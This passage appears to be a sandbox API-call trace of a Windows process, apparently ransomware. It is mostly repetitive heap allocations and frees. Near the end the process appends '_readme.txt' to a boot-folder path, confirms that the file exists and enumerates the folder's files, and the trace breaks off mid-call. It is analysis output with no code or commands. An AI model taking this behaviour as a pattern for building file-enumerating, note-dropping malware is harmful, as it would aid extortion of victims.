hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.529] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.530] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.531] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.531] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.532] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.532] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.533] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.533] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.534] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.534] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.534] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.534] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.534] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0146.534] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.534] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.534] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.534] PathFindFileNameW (pszPath="") returned="" [0146.534] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.534] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.534] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.534] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.534] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.534] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.534] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.534] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.534] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0146.534] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.534] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.534] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0146.536] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.536] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.536] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.536] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.536] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.536] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.536] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb45b50, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.536] FindNextFileW (in: hFindFile=0x3220d58, 